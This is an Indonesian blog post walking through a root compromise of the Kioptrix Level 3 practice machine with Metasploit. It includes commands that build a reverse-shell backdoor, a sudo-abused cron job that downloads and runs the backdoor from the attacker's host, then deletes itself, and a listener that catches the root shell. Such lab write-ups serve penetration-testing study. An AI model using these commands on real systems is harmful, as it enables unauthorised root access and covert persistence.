Searching...
November 17, 2011
Thursday, November 17, 2011

[KIOPTRIX LV3] Metasploit VS Ubuntu

Ini adalah lanjutan dari post [KIOPTRIX LV 3] Attack User

Pada Pentest kali ini, saya akan mendemonstrasikan menyerang web server yang menggunakan Ubuntu dengan Metasploit.

Note: IP address saya 192.168.1.2

Preparation:
1. Metasploit ---> Download Page

Briefing:
1. Buat backdoor
2. Buat Script untuk mendownload backdoor yang sudah kita buat
3. Jalankan exploit multi handler dan Game Over

Walkthrough:

1. Buat backdoor

Buka terminal, lalu masukan perintah:

root@red-dragon:# cd /pentest/exploits/framework2

root@red-dragon:/pentest/exploits/framework2# msfpayload -p linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /var/www/back.door



2. Buat Script untuk mendownload backdoor yang sudah kita buat

Buka terminal, lalu masukan perintah:

root@red-dragon:/pentest/exploits/framework2# ssh loneferret@kioptrix3.com

Masukan password.
Note: Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User

Kemudian

loneferret@kioptrix3:~$ sudo ht

Note: Jika ditanyakan password, masukan password loneferret
Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User


Pada console ht, tekan atl+f kemudian pilih new

Masukan kode berikut:

* * * * * root cd /tmp/; wget 192.168.1.2/back.door && chmod +x && ./back.door; rm /etc/cron.d/exploit



Tekan alt+f kemudian pilih save, dan masukan nama file dengan nama /etc/cron.d/exploit


3. Jalankan exploit multi handler dan Game Over

Buka terminal masukan perintah:

root@red-dragon:/pentest/exploits/framework2# msfcli multi/handler PAYLOAD=linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 E

Tunggu sejanak.. Daaaaaaaan..


Berhasil.. Command Shell sesi pertama telah terbuka. Dalam keadaan ini, kita telah mengendalikan system dengan terminal atas nama root (administrator)

Created:
red-dragon

Supported by:
Bule Dragon

Loved by:
Yoshephine Handini

1 comment:

Post a Comment

 
Back to top!